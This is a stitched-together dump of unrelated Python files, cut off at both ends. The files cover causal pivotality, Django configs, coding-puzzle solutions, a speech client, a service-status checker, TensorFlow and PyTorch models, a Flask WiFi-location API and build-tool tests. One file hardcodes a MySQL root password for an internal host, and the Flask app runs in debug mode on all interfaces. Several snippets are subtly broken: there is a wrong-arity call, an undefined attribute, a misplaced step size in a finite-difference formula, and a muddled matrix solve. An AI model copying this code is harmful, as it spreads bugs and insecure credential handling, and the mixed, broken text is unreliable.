copy.assign_values(values)
outcome = copy.evaluate(effect)
copy.clear_values()
if attr.has_key('e_value'):
if outcome == attr['e_value']:
total += 1
if pivotal(copy, cause, effect, e_value=attr['e_value']):
count += 1
else:
total = len(list(product(*[(0, 1) for v in xrange(len(exogenous))])))
if pivotal(copy, cause, effect):
count += 1
return float(count)/total
def unpacked_pivotality(hierarchy, cause, effect, **attr):
path = hierarchy.path(cause, effect)
if path != []:
piv = []
for node in path:
if node != effect:
if 'e_value' in attr:
p = pivotality(hierarchy, node, effect, e_value=attr['e_value'])
else:
p = pivotality(hierarchy, node, effect)
piv.append(p)
return sum(piv)/float(len(piv))
else:
return 'cannot be unpacked'
|
# Generated by Django 2.2.7 on 2019-12-12 08:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('web', '0004_auto_20191212_0831'),
]
operations = [
migrations.AlterUniqueTogether(
name='document',
unique_together={('source', 'embedding_type')},
),
]
|
# -*- coding: utf-8 -*-
from sqlalchemy import create_engine
__author__ = 'Haoran'
mysql_db = create_engine('mysql+pymysql://root:growth@192.168.20.96:3306/sem?charset=utf8', echo=False)
user_agent = """Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/53.0.2785.116 Safari/537.36"""
headers = {'User-Agent': user_agent}
|
def fib(max):
n,a,b = 0,0,1
while n < max:
print(b)
a,b = b,a+b
n += 1
return 'lalalalal'
fib(6)
|
from wit import Wit
import wave
import pyaudio
import os
from array import array
import logging
class Witai:
def __init__(self):
self.client = Wit(access_token=os.environ.get('wit_token'))
def create_audio_file(self):
audio_format = pyaudio.paInt16
channels = 2
sample_rate = 44100
chunk = 1024
recording_seconds = 5
file_name = "resources/audio.wav"
audio = pyaudio.PyAudio() # instantiate the pyAudio
# recording prerequisites
stream = audio.open(format=audio_format, channels=channels,
rate=sample_rate,
input=True,
frames_per_buffer=chunk)
# starting recording
frames = []
for i in range(0, int(sample_rate / chunk * recording_seconds)):
data = stream.read(chunk)
data_chunk = array('h', data)
vol = max(data_chunk)
if vol >= 500:
frames.append(data)
# end of recording
stream.stop_stream()
stream.close()
audio.terminate()
# writing to file
wave_file = wave.open(file_name, 'wb')
wave_file.setnchannels(channels)
wave_file.setsampwidth(audio.get_sample_size(audio_format))
wave_file.setframerate(sample_rate)
wave_file.writeframes(b''.join(frames)) # append frames recorded to file
wave_file.close()
def create_message_request(self, text):
try:
resp = self.client.message(text)
print('Yay, got Wit.ai response: ' + str(resp))
except Exception:
self.client.logger.setLevel(logging.WARNING)
print('Something went wrong with the message request')
def create_speech_request(self):
self.create_audio_file()
try:
with open('resources/audio.wav', 'rb') as f:
res = self.client.speech(f, None, {'Content-Type': 'audio/wav'})
print('Yay, got Wit.ai response: ' + str(res))
except Exception:
self.client.logger.setLevel(logging.WARNING)
print("Something went wrong with the speech request")
|
import sys
import random
#define a function for printing a grid
def print_grid(input_grid):
print("||-------||");
for row in input_grid:
print(row);
print("||-------||");
#input parameters
M, N = 5, 7;
max_val = 5;
#use hashtables as SETS (because insertion in hash-table is O(1), but for sets it is O(n))
row_hash_table = {};
col_hash_table = {};
#create a grid for testing purposes
grid = [ [random.randint(0, max_val) for col in range(N)] for row in range(M) ];
print_grid(grid);
#check the rows, cols that need to be set to zero (in O(MN))
for row in range(len(grid)):
for col in range(len(grid[0])):
if (not grid[row][col]):
row_hash_table[row] = True;
col_hash_table[col] = True;
#go through elements in the hash-tables, clear the rows and the columns in (in O(MN))
for row in row_hash_table:
grid[row] = [0] * len(grid[row]);
for col in col_hash_table:
for row in range(len(grid)):
grid[row][col] = 0;
#print the output
print_grid(grid);
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 12 19:15:08 2015
@author: LIght
"""
import numpy
class LFM:
@staticmethod
def matrix_factorization(R, P, Q, K, steps=1000, alpha=0.0002, beta=0.02):
Q = Q.T
for step in xrange(steps):
print step
for i in xrange(len(R)):
for j in xrange(len(R[i])):
if R[i][j] > 0:
eij = R[i][j] - numpy.dot(P[i,:],Q[:,j])
for k in xrange(K):
P[i][k] = P[i][k] + alpha * (2 * eij * Q[k][j] - beta * P[i][k])
Q[k][j] = Q[k][j] + alpha * (2 * eij * P[i][k] - beta * Q[k][j])
#eR = numpy.dot(P,Q)
e = 0
for i in xrange(len(R)):
for j in xrange(len(R[i])):
if R[i][j] > 0:
e = e + pow(R[i][j] - numpy.dot(P[i,:],Q[:,j]), 2)
for k in xrange(K):
e = e + (beta/2) * (pow(P[i][k],2) + pow(Q[k][j],2))
if e < 0.001:
break
return P, Q.T
'''
example code, too slow for movielens matrix, optimize
R = np.array(user_item_matrix)
N = len(R)
M = len(R[0])
K = 5
P = np.random.rand(N,K)
Q = np.random.rand(M,K)
nP, nQ = lfm.LFM.matrix_factorization(R, P, Q, K)
nR = np.dot(nP, nQ.T)
'''
|
# coding=utf-8
"""
statusdocke.py
Desc: from version rest API get service runing status._queryStatus()
checkRunner() -> _checkRunning()->_isRunning(),_queryStatus()
Maintainer: wangfm
CreateDate: 2016/12/7
"""
import requests
import json
from logger import logger
from time import sleep
# logging.basicConfig(level=logging.ERROR)
# base data, Cautious modification
serviceInfos = [{
'serviceName': 'interact'
}, {
'serviceName': 'jycenter'
}, {
'serviceName': 'middlecenterfile'
}, {
'serviceName': 'middlecas'
}, {
'serviceName': 'middlecenterres'
}, {
'serviceName': 'middleclient'
}]
# {'serviceName': 'middleware-mcu'},
# test Data,del later
testflag = [{
'status': 'On',
u'dbversion': u'V1.10.11.R',
'serviceName': 'interact',
u'version': u'V1.02.002.B.044',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.18.R',
'serviceName': 'jycenter',
u'version': u'V1.01.001.B.008',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.15.R',
'serviceName': 'middlecenterfile',
u'version': u'V1.00.001.B.010',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
'serviceName': 'middlecas',
u'version': u'V1.02.002.B.007',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
u'dbversion': u'V1.10.18.R',
'serviceName': 'middlecenterres',
u'version': u'V1.01.001.B.008',
'serviceIp': '10.1.0.56'
}, {
'status': 'On',
'serviceName': 'middleclient',
u'version': u'V2.01.001.B.011',
'serviceIp': '10.1.0.56'
}]
def _queryStatus(*args):
"""
Function: _queryStatus()
Desc: request rest API get service information.
Args:
-
Return: dict-> service status
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
urlhead, urlip, dockermodel, urltail = 'http://', args[0], args[
1], '/version'
requesturl = ''.join([urlhead, urlip, '/', dockermodel, urltail])
logger.debug("Request URL is: {}".format(requesturl))
serviceStatusInit = {
'status': 'Off',
'serviceIp': args[0],
'serviceName': args[1]
}
try:
r = requests.get(requesturl)
# logger.debug(r)
if r.status_code == 200:
if not hasattr(r, 'text'):
logger.info("failed")
else:
try:
result = json.loads(r.text)
servicetatus = dict(serviceStatusInit)
servicetatus.update(result)
if servicetatus.has_key('version'):
servicetatus['status'] = 'On'
else:
servicetatus['status'] = 'NoSuch'
except ValueError:
servicetatus = dict(serviceStatusInit)
servicetatus['status'] = 'Off'
else:
servicetatus = dict(serviceStatusInit)
except requests.exceptions.ConnectionError:
servicetatus = dict(serviceStatusInit)
servicetatus['status'] = 'ConnectionError'
finally:
return servicetatus
# def checkisRunning():
# print isRunning(testflag)
def _isRunning(serviceStatus):
"""
Function: _isRunning()
Desc: 检查服务是否都On,检查到服务非正常状态,返回False,不会继续检查。
Args: requests version API retruns dict(serviceStatus)
- dict
Return: False/None
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
for flagtmp in serviceStatus:
if flagtmp['status'] == 'On':
logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status']))
else:
logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status']))
return False
def _checkRunning(plathost):
"""
Function: _checkRunning()
Desc: 检查服务是否都正常,正常则返回True,不正常则重复检查最多5次。
Args:
-
Return: True/None
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
arrstatus = []
for serviceInfo in serviceInfos:
arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName']))
for dotimes in range(5):
logger.info("###################Service Status###################")
if _isRunning(arrstatus) is not False:
logger.info("Service is Running..")
logger.info("####################################################")
return True
else:
logger.info('sleep 120s..')
sleep(120)
logger.info("####################################################")
def t_status(plathost):
"""
Function: _status()
Desc: 通过_queryStatus()返回一个服务状态list
Args:
-
Return:
Usage:
Maintainer: wangfm
CreateDate: 2016/12/7
"""
arrstatus = []
for serviceInfo in serviceInfos:
arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName']))
return arrstatus
def checkRunner(plathost):
return _checkRunning(plathost)
if __name__ == "__main__":
# if isRunning(testflag) is False:
# print "no"
# else:
# print "yes"
# checkRunning()
# print checkRunning()
print t_status('10.1.41.12', serviceInfos)
|
from django.apps import AppConfig
class ProductdtConfig(AppConfig):
name = 'ProductDT'
verbose_name = '产品'
|
a = "abcdefghijklmnopqrstuwxyz"
n = 5
a = a[:n]
a = a[n-1::-1] #reversing
rev = n-1
count , i = 0 , 0
while i>=0:
count+=1
res = '-'.join(a[:i]+a[i::-1])
print(res.center((4*n)-3, '-'))
if(count >= (n)):
i-=1
else:
i+=1
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 17:51:34 2015
@author: HSH
"""
class Solution(object):
def rotate(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: void Do not return anything, modify matrix in-place instead.
"""
start = 0
end = len(matrix) - 1
while start < end:
for i in range(start, end):
offset = i - start
temp = matrix[start][i]
matrix[start][i] = matrix[end - offset][start]
matrix[end - offset][start] = matrix[end][end - offset]
matrix[end][end - offset] = matrix[start + offset][end]
matrix[start + offset][end] = temp
start += 1
end -= 1
return
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:hua
import re
with open("test2.txt","r",encoding="utf-8") as f:
s11 = f.read()
# print(s11)
s1=s11.strip()
s2 = s1.replace(">","")
s3 = s2.replace("<","")
s4 = s2.replace("=","")
s5 = s4.replace("=","")
s6 = re.sub('[<>?;($#&":\-\'.//!}{)_]+','',s5)
s7=s6.replace('<>< ="-:','')
print(s7)
file = open('test3.txt', 'wb')
file.write(str(s7).encode("utf-8"))
file.close()
|
# see http://blog.luisrei.com/articles/flaskrest.html
# curl -H "Content-type: application/json" -X POST http://127.0.0.1:5000/submit -d @test_data.json
from flask import Flask, request, json
import numpy as np
import tensorflow as tf
import os, sys, random, csv, math
from model import create_network
from utils import read_labels
num_results = 3
mean_path = 'mean.npy'
std_path = 'std.npy'
metainfo_path = 'wifiscan_metainfo.csv'
labels_csv = 'wifiscan_labels.csv'
network_name = 'wifi_model_log-1-79100'
load_model_from = 'Model/80/' + network_name
u = read_labels(labels_csv)
name_to_vector = u['name_by_vector']
vector_to_name = u['vector_by_name']
classes = u['names']
mean = np.load(mean_path)
std = np.load(std_path)
n_classes = len(classes)
n_features = mean.shape[0]
mac_order = []
with open(metainfo_path, 'rt') as f:
reader = csv.reader(f, delimiter=';')
for row in reader:
mac_order.append(row[1])
default_level = math.log10(100+1)
app = Flask(__name__)
history = []
if __name__ == '__main__':
g = tf.Graph()
with g.as_default():
with tf.Session(graph = g) as sess:
X, Y_pred = create_network(n_features, n_classes, is_training=False)
init = tf.global_variables_initializer()
sess.run(init)
saver = tf.train.Saver()
print("Loading model from", load_model_from)
saver.restore(sess, load_model_from)
@app.route('/')
def index():
return "Hello, World! POST a JSON map of MAC->abs(signal) to /submit"
@app.route('/submit', methods = ['POST'])
def submit():
if request.headers['Content-Type'] == 'application/json':
empty_vector = np.asarray( [default_level]*n_features, dtype=np.float )
for mac, signal in request.json.items():
if mac not in mac_order:
continue
index = mac_order.index(mac)
empty_vector[index] = math.log10(1+signal)
x = (empty_vector - mean)/(std + 1e-10)
x = np.expand_dims(x, axis=0)
pred = sess.run([Y_pred], feed_dict={X: x})[0][0]
print("pred=", pred)
topIndices = pred.argsort()[-num_results:][::-1].tolist()
#print( classes )
#print( [i for i in topIndices] )
#print( [classes[i] for i in topIndices] )
#print( [pred[i] for i in topIndices] )
resp = [ [classes[i] , pred[i]] for i in topIndices]
#print(str(resp))
top = topIndices[0]
history.append(top)
if len(history) > 10:
h = history[-10:]
f = {}
for n in h:
if not n in f:
f[n] = 0
f[n]+=1
mx = 0
top = 0
for i, c in f.items():
if c > mx:
mx = c
top = i
print(classes[top] + ": " + str(pred[top]))
#if pred[top] <= 0.5:
# return "not sure..."
return "" + classes[top] + ":" + str(pred[top])
#return "{'result':" + str(resp) + "}"
return "{'err': '415 Unsupported Media Type ;)'}"
app.run(debug=True, host="0.0.0.0")
|
from .pages.main_page import MainPage
from .pages.product_page import ProductPage
def test_guest_should_see_login_link(browser):
#link = "http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear"
link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=newYear2019"
page = MainPage(browser, link)
page.open()
product_page = ProductPage(browser, browser.current_url)
product_page.add_good_to_basket()
product_page.solve_quiz_and_get_code()
product_page.check_good()
|
import support_lib as bnw
import time
# 2016/08/31 - Original version
# This routine attempts to add a player to the specified game
def createPlayer(playerEmail, playerName, shipName, gameURL):
debug = True
# xpaths
xEmailAddress = 'html/body/form/dl/dd[1]/input'
xShipName = 'html/body/form/dl/dd[2]/input'
xPlayerName = 'html/body/form/dl/dd[3]/input'
xPageBanner = 'html/body/h1'
xSubmitButton = 'html/body/form/div/input[1]'
if debug:
print("Attempting to load the new player entry page")
newPlayerPage = 'http://{}/new.php'.format(gameURL)
bnw.loadPage(newPlayerPage)
bannerText = bnw.textFromElement(xPageBanner)
if not bannerText == 'Create New Player':
if debug:
print('Unable to load the create new player page - bad URL?')
return ['ERROR', 'Bad URL']
if not bnw.fillTextBox(xEmailAddress, playerEmail):
if debug:
print('Unable to fill in the new player email address')
return ['ERROR', 'E-Mail XPath Error']
if not bnw.fillTextBox(xShipName, shipName):
if debug:
print('Unable to fill in the new player ship name')
return ['ERROR', 'Ship Name XPath Error']
if not bnw.fillTextBox(xPlayerName, playerName):
if debug:
print('Unable to fill in the new player name')
return ['ERROR', 'Player Name XPath Error']
if not bnw.clickButton(xSubmitButton):
if debug:
print('Unable to click the new player submit button')
return ['ERROR', 'Submit Button Error']
time.sleep(3)
bannerText = bnw.textFromElement(xPageBanner)
if not bannerText == 'Create New Player Phase Two':
if debug:
print('Error entering new player info?')
return ['ERROR', 'Bad Player Info']
print('Password must have been sent...')
|
# 1. Nhập vào 2 số nguyên a, b. In ra các số nguyên nằm giữa a và b trên cùng 1 dòng.
#---------------------
a = int(input("Nhap so nguyen a : "))
b = int(input("Nhap so nguyen b : "))
for i in range(b+1,a,1 ) :
print(i ,end = ' ')
#-----------------------
|
class Solution:
def rob(self, nums: List[int]) -> int:
l = len(nums)
dp = [0]*l
if l == 0:
return 0
if l < 3:
return max(nums)
dp[0] = nums[0]
dp[1] = nums[1]
dp[2] = nums[0]+nums[2]
for i in range(3,l):
dp[i] = nums[i]+max(dp[i-2],dp[i-3])
# print(dp)
return max(dp[-1],dp[-2])
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:
sorted_box_types, result = (
sorted(boxTypes, key=lambda el: el[1], reverse=True),
0,
)
for number_of_boxes, number_of_units_per_box in sorted_box_types:
number_of_boxes_taken = min(number_of_boxes, truckSize)
result += number_of_boxes_taken * number_of_units_per_box
truckSize -= number_of_boxes_taken
if not truckSize:
break
return result
if __name__ == "__main__":
solution = Solution()
assert 8 == solution.maximumUnits([[1, 3], [2, 2], [3, 1]], 4)
assert 91 == solution.maximumUnits([[5, 10], [2, 5], [4, 7], [3, 9]], 10)
|
# 闭包
# 保存,返回闭包时的变量的范围和状态(外层函数变量的状态)
# 闭包需要有内层函数
# 闭包内层函数需要调用外层函数变量
# 返回出内层函数
def func(a, b):
c = 10
def inner_func():
s = a + b + c
print("相加之和的结果是:", s)
return inner_func
ifunc = func(2, 3)
ifun1 = func(2, 8)
ifunc()
def funv():
c = 1
def funb():
print("时间")
def funN():
funb()
print("funN")
return funN
ifun2 = funv()
ifun2()
# 计数器
def generate_count():
counter = [0]
def add_one():
# nonlocal counter 不需要加局部变量注释,因为是列表,列表是可变的
counter[0] += 1
print("当前是第{}次调用".format(counter))
return add_one
counter = generate_count()
counter()
counter()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 11 23:32:56 2020
@author: shaun
"""
import numpy as np
def firstorder(f1,f2,h):
answer=(f1-f2)/h
return answer
def firstorderwhole(listx,listy,h):
L=len(listy)
y=[]
x=[]
for i in range(0,L-1):
y.append(firstorder(listy[i],listy[i+1],h))
x.append(listx[i])
return [x,y]
def secondorder(f1,f3,h):
y=[]
x=[]
answer=(f3-f1)/(2*h)
return answer
def secondorderwhole(listx,listy):
L=len(listy)
y=[]
x=[]
for i in range(1,L-1):
h=abs(listx[i]-listx[i-1])
y.append(secondorder(listy[i-1],listy[i],h))
x.append(listx[i])
x=np.array(x)
y=np.array(y)
return x,y
def fourthorder(f1,f2,f3,f4,h):
f=(f1-8*f2+8*f3-f4)/12*h
return f
def fourthorderwhole(listx,listy,h):
y=[]
x=[]
L=len(listy)
for i in range(3,L-2,3):
y.append(fourthorder(listy[i-2],listy[i-1],listy[i+1],listy[i+2],h))
x.append(listx[i])
return x,y
def fourthorders(f1,f2,f3,f4,h):
A=np.matrix([[1,1,1,1],[0,1,2,3],[0,0.5,2,9/2],[0,1/6,8/6,27/6]],float)
B=np.matrix([[0],[-1/h],[0],[0]],float)
A_inverse= np.linalg.inv(A)
a=A_inverse*B
answer=a[0]*f1+a[1]*f2+a[2]*f3+a[3]*f4
return answer
def tridiag(a, b, c, k1=-1, k2=0, k3=1):
return np.diag(a, k1) + np.diag(b, k2) + np.diag(c, k3)
#pade scheme
def pade(a,b,c,d,l,F):
A=[]
B=[]
C=[]
D=[]
B.append(b[0])
C.append(c[0])
print("this is l length:"+ str(l))
for k in range(0,l-2):
A.append(a[1])
B.append(b[1])
C.append(c[1])
B.append(b[2])
A.append(a[2])
D.append(d[0][0]*F[0]+d[0][1]*F[1]+d[0][2]*F[2])
print("this is F length:"+str(len(F)))
for k in range(0,len(F)-2):
D.append(d[1][0]*(F[k+2]-F[k]))
D.append(d[2][0]*F[-3]+d[2][1]*F[-2]+d[2][2]*F[-1])
T = tridiag(A, B, C)
print(T)
alpha=[B[0]]
beta=[]
victor=[D[0]]
N=len(A)
f=[]
for k in range(0,N):
beta.append((A[k]/alpha[k]))
alpha.append(B[k+1]-C[k]*beta[k])
for k in range(0,N):
victor.append(D[k+1]-beta[k]*victor[-1])
f.append(victor[-1]/alpha[-1])
for k in range(N-1,-1,-1):
f.append((victor[k]-C[k]*f[-1])/alpha[k])
f.reverse()
return f
#use this if you do not have a triangular structure
def badpade(a,b,c,d,l,F):
A=[]
B=[]
C=[]
D=[]
B.append(b[0])
C.append(c[0])
for k in range(0,l-2):
A.append(a[1])
B.append(b[1])
C.append(c[1])
B.append(b[2])
A.append(a[2])
D.append([d[1][0]*(F[1]-F[l-1])])
for k in range(0,len(F)-2):
D.append([d[1][0]*(F[k+2]-F[k])])
D.append([d[1][0]*(F[0]-F[l-1])])
T = tridiag(A, B, C)
T[0,2]=c[2]
T[-1,-3]=a[0]
D=np.array(D)
IT=np.linalg.inv(T)*(D.transpose())
f=np.matmul(IT,D)
return f
d=np.array([[1,2,3],[3,0,0],[7,8,9]], int)
ans=badpade([-5,1,2],[1,4,1],[2,1,82],d,5,[1,1,1,1,1])
#print(pade([0,1,2],[1,4,1],[2,1,0],d,5,[1,1,1,1,1]))
print(ans)
|
import unittest
from katas.kyu_8.bug_fixing_6 import eval_object
class EvalObjectTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '+'}), 2)
def test_equals_2(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '-'}), 0)
def test_equals_3(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '/'}), 1)
def test_equals_4(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '*'}), 1)
def test_equals_5(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '%'}), 0)
def test_equals_6(self):
self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '**'}), 1)
|
"""
Fuzzy matching of strings/names.
"""
import csv
from collections import defaultdict, Counter
def group_by(kv_pairs):
"""Group key-value pairs by key"""
groups = defaultdict(list)
for k, v in kv_pairs:
groups[k].append(v)
return groups
def ngrams(text, n=3):
"""Return list of text n-grams of size n"""
return {text[i:i + n].lower() for i in range(len(text) - n + 1)}
def find(query, index):
"""Find best match of query string in n-gram index"""
sgrams = ngrams(query)
matches = Counter(sid for ngram in sgrams for sid in index.get(ngram, []))
return matches.most_common(1)
def create_index(filepath):
"""Create n-gram index that maps n-grams to subject ids"""
sid2name = load_sid2name(filepath)
return group_by((ngram, sid) for sid, name in sid2name for ngram in ngrams(name))
def load_sid2name(filepath):
"""Load file that maps subject ids to names"""
with open(filepath) as csvfile:
reader = csv.reader(csvfile)
next(reader) # skip header
for sid, name in reader:
yield sid.strip(), name.replace(',', ' ')
# Example main
if __name__ == '__main__':
print('running')
index = create_index('../data/index.csv')
while 1:
query = input('search: ')
if query == 'q': break
match = find(query, index)
print(match[0] if match else 'NO MATCH')
print('-' * 50)
|
class Vetor:
def __init__(self, lista):
self.lista = lista
self.ordenado = False
def __str__(self):
return self.nome
|
import math
import os
import numpy as np
import tensorflow as tf
from tqdm import tqdm
from Inception import inception
import hyperparams as hp
BUFFER_SIZE = 100
x_train = []
y_train = []
categories = os.listdir(path='Images')[:10]
print(len(categories))
num_categories = len(categories)
for idx, category in enumerate(categories):
files = os.listdir(path='Images/' + category)
for file in files:
img = tf.keras.preprocessing.image.load_img('Images/%s/%s' % (category, file), target_size=(hp.ss, hp.ss))
img = tf.keras.preprocessing.image.img_to_array(img)
img /= 255
x_train.append(img)
y_train.append(idx)
x_train = np.array(x_train, dtype=np.float32)
print(y_train)
y_train = tf.keras.utils.to_categorical(np.array(y_train))
print(x_train.shape)
print(y_train)
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train)).shuffle(BUFFER_SIZE).batch(hp.batch_size)
print(train_dataset)
model = inception(num_categories)
tf.keras.utils.plot_model(model, show_shapes=True)
optimizer = tf.keras.optimizers.Adam(1e-4)
checkpoint_prefix = os.path.join(hp.checkpoint_dir, "ckpt")
checkpoint = tf.train.Checkpoint(model=model,
optimizer=optimizer)
if os.path.exists(hp.checkpoint_dir):
checkpoint.restore(tf.train.latest_checkpoint(hp.checkpoint_dir))
# print(model.summary())
loss_object = tf.keras.losses.CategoricalCrossentropy()
print('Prediction: ', np.argmax(model.predict(x_train[0].reshape(1, 299, 299, 3))))
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy')
@tf.function
def train_step(imgs, lbls):
with tf.GradientTape() as tape:
predictions = model(imgs, training=True)
loss = loss_object(lbls, predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
train_loss(loss)
train_accuracy(lbls, predictions)
def train():
def ceil(val):
return math.ceil(val * 100) / 100
for epoch in range(hp.epochs):
train_loss.reset_states()
train_accuracy.reset_states()
for images, labels in tqdm(train_dataset, total=len(list(train_dataset))):
train_step(images, labels)
if (epoch + 1) % 1 == 0:
checkpoint.save(file_prefix=checkpoint_prefix)
template = 'Epoch {}, Loss: {}, Accuracy: {}'
print(template.format(epoch + 1,
ceil(train_loss.result()),
ceil(train_accuracy.result() * 100)))
train()
|
import torch
from torch.autograd import Variable
from torch import nn, optim
class SimpleCNN(nn.Module) :
def __init__(self) :
# b, 3, 32, 32
super().__init__()
layer1 = nn.Sequential()
layer1.add_module('conv_1', nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1))
# b, 32, 32, 32
layer1.add_module('relu_1', nn.ReLU(True))
layer1.add_module('pool_1', nn.MaxPool2d(2, 2)) # b, 32, 16, 16
self.layer1 = layer1
layer2 = nn.Sequential()
layer2.add_module('conv_2', nn.Conv2d(32, 64, 3, 1, padding=1))
# b, 64, 16, 16
layer2.add_module('relu_2', nn.ReLU(True))
layer2.add_module('pool_2', nn.MaxPool2d(2, 2)) # b, 64, 8, 8
self.layer2 = layer2
layer3 = nn.Sequential()
layer3.add_module('conv_3', nn.Conv2d(64, 128, 3, 1, padding=1))
# b, 128, 8, 8
layer3.add_module('relu_3', nn.ReLU(True))
layer3.add_module('pool_3', nn.MaxPool2d(2, 2)) # b, 128, 4, 4
self.layer3 = layer3
layer4 = nn.Sequential()
layer4.add_module('fc_1', nn.Linear(2048, 512))
layer4.add_module('fc_relu1', nn.ReLU(True))
layer4.add_module('fc_2', nn.Linear(512, 64))
layer4.add_module('fc_relu2', nn.ReLU(True))
layer4.add_module('fc_3', nn.Linear(64, 10))
self.layer4 = layer4
def forward(self, x):
conv1 = self.layer1(x)
conv2 = self.layer2(conv1)
conv3 = self.layer3(conv2)
fc_input = conv3.view(conv3.size(0), -1)
fc_out = self.layer4(fc_input)
return fc_out
# 建立模型
model = SimpleCNN()
print(model)
a=torch.FloatTensor([[1,2,3],[4,5,6]])
print(a)
|
#!/bin/python3
from sys import stdin
key = ""
value = []
pom = 1
#TODO Wywalić pierwszego if'a poza for'a jako pojedyńczy stdin > DONE
firstRow = stdin.readline()
key = firstRow.split('\t')[0]
value.append(firstRow.split('\t')[1].replace("\n", ""))
for i in stdin:
if i.split('\t')[0] == key:
value.append(i.split('\t')[1].replace("\n", ""))
else:
print(key,"\t",value)
value = []
key = i.split('\t')[0]
value.append(i.split('\t')[1].replace("\n", ""))
print(key, "\t", value)
|
from django.conf.urls import url
from . import views
app_name="myapp"
urlpatterns = [
url(r'^$', views.addressbook),
url(r'^add/', views.add),
url(r'^upload/', views.upload),
url(r'^continue/', views.continueProcessCSV),
url(r'^truncate/', views.truncateTable),
url(r'^download/', views.downloadCSV),
]
|
from django.contrib import admin
from forum.models import *
# Register your models here.
##Admin
class ForumAdmin(admin.ModelAdmin):
pass
class ThreadAdmin(admin.ModelAdmin):
list_display = ["title", "forum", "created_by", "time"]
list_filter = ["forum","created_by"]
class PostAdmin(admin.ModelAdmin):
search_fields = ["title", "created_by"]
list_display = ["title","thread", "created_by","time"]
admin.site.register(Forum,ForumAdmin)
admin.site.register(Thread,ThreadAdmin)
admin.site.register(Post,PostAdmin)
|
import json
import datetime
import sys
sys.path.append('../../python')
import inject
inject.configure()
import logging
from model.registry import Registry
from model.connection.connection import Connection
from model.assistance.justifications.imapJustifier.imapJustifier import ImapJustifier
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
reg = inject.instance(Registry)
conn = Connection(reg.getRegistry('dcsys'))
con = conn.get()
try:
ImapJustifier.loadJustifications(con)
con.commit()
finally:
conn.put(con)
|
from math import pi
def circle_area(r):
if type(r) not in [int, float]:
raise TypeError("The radius must be a non-negative real number.")
if r < 0:
raise ValueError("The radius must not be negative.")
return pi*(r**2)
def rectangle_area(w,l):
if type(w) not in [int, float]:
raise TypeError("The width must be a non-negative real number.")
if w < 0:
raise ValueError("The width must not be negative.")
if type(l) not in [int, float]:
raise TypeError("The length must be a non-negative real number.")
if l < 0:
raise ValueError("The length must not be negative.")
return w*l
def square_area(a):
return rectangle_area(a,a)
|
def draw_stars(x):
for new in x:
star = new * "*"
print star
draw_stars([4, 6, 1, 3, 5, 7, 25])
# part 2
def stars2(arr):
for x in arr:
if isinstance(x, int):
print x * "*"
elif isinstance(x, str):
length = len(x)
letter = x[0].lower()
print letter * length
x = [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"]
stars2(x)
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import pytest
from pants.backend.google_cloud_function.python.target_types import (
PythonGoogleCloudFunction,
PythonGoogleCloudFunctionRuntime,
)
from pants.backend.google_cloud_function.python.target_types import rules as target_type_rules
from pants.backend.python.target_types import PythonRequirementTarget, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.build_graph.address import Address
from pants.core.target_types import FileTarget
from pants.engine.target import InvalidFieldException
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*target_type_rules(),
*python_target_types_rules(),
],
target_types=[
FileTarget,
PythonGoogleCloudFunction,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
],
)
@pytest.mark.parametrize(
["runtime", "expected_major", "expected_minor"],
(
# The available runtimes at the time of writing.
# See https://cloud.google.com/functions/docs/concepts/python-runtime.
["python37", 3, 7],
["python38", 3, 8],
["python39", 3, 9],
["python310", 3, 10],
["python311", 3, 11],
),
)
def test_to_interpreter_version(runtime: str, expected_major: int, expected_minor: int) -> None:
assert (expected_major, expected_minor) == PythonGoogleCloudFunctionRuntime(
runtime, Address("", target_name="t")
).to_interpreter_version()
@pytest.mark.parametrize("invalid_runtime", ("python88.99", "fooobar"))
def test_runtime_validation(invalid_runtime: str) -> None:
with pytest.raises(InvalidFieldException):
PythonGoogleCloudFunctionRuntime(invalid_runtime, Address("", target_name="t"))
|
# this prints last 2 characters of string
def extra_end(str):
str2 = ""
for i in range(3):
str2 = str2 + str[-2:]
return str2
# first 2 characters
def first_two(str):
